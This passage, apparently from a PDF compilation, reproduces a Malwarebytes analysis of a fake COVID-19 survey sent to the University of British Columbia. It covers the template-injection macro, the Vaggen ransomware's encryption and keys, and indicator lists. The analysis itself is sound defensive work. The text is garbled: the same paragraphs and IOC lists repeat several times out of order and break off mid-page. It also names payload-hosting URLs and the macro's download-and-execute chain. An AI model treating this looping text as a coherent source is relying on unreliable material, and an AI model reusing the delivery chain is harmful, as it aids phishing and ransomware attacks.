privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2760 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2761 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2762 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2763 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2764 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2765 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2766 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2767 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2768 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2769 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2770 of 3467\n\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2771 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2772 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2773 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2774 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2775 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2776 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2777 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2778 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2779 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2780 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2781 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2782 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2783 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2784 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2785 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2786 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2787 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2788 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2789 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2790 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2791 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2792 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2793 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2794 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 2795 of 